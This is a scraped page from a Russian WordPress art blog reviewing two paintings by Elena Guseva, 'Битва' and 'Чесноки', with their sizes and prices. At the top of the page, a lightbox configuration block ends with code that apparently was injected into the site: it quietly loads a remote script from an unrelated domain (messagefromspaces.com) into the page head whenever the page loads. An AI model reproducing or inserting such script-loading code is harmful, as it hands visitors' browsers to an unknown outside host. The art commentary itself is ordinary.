, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })
Пользовательский поиск

Добро пожаловать

Советую посмотреть

Страницы

Свежие комментарии

Обмен ссылками

Картины, портреты, критика живописи, Art-дилер




style="display:inline-block;width:120px;height:600px"
data-ad-client="ca-pub-5725625417417931"
data-ad-slot="8961029732">


« | Главная | »

Картины «Битва» и «Чесноки» от Елены Гусевой

Автор: Natalia Nikitina | 14 Сен 2012

картина БитваКартина «Битва» Елены Гусевой невольно возвращает к стародавним временам, о которых мы знаем лишь из истории, вспоминаются предания о Спарте, легенды и мифы древней Греции с её суровыми нравами и буднями, не обходящимися без турниров и поединков.По образу герои картины напоминают титанов, славящихся жаждой власти, силой воли к победе, беспрекословному лидерству. Способствуют этому восприятию и атлетические фигуры воинов.

И хотя один из участников изображён поверженным, без меча и щита, лишённым возможности двигаться, спокойные тона картины вселяют надежду в открытие второго дыхания и победы силы воли над безысходностью.

«Битва» , размер 125х122см , 2011 г. Цена 20 000 руб. Картина находится в Москве.

Елена Гусева, картина ЧеснокиВы устали от однообразности, от текущих спокойною рекой событий жизни, от чередующихся, не отличимых друг от друга дней и ночей?! Значит, настала пора колоссальных изменений, выбора новых поворотов, входов в закрытые двери и попросту входа в пространство с табличкой «Выход».

Но если пока Вы не готовы к столь радикальным мерам и всё ещё переживаете относительно последствий, начните со смены настроения собственного и настроения Вашего дома, внесите новые краски в интерьер, который непременно поспособствует появлению иных эмоций и ощущений.

Картина Елены Гусевой «Чесноки» – и есть приправа к пресным будням. Выполненная в цвете и монохроме, она как нельзя лучше показывает «до» и «после»…

Подарите своему дому неповторимый аромат!

«Чесноки» , холст, масло, размер 60х80см , 2010 г. Цена 15 000 руб. Картина находится в Москве.

Оставить заявку на покупку картин вы можете на странице контакты.

Темы: Галерея картин художников, Критика | Ваш отзыв »

Отзывы

Перед отправкой формы:
Лаборатория Искусства работает на WordPress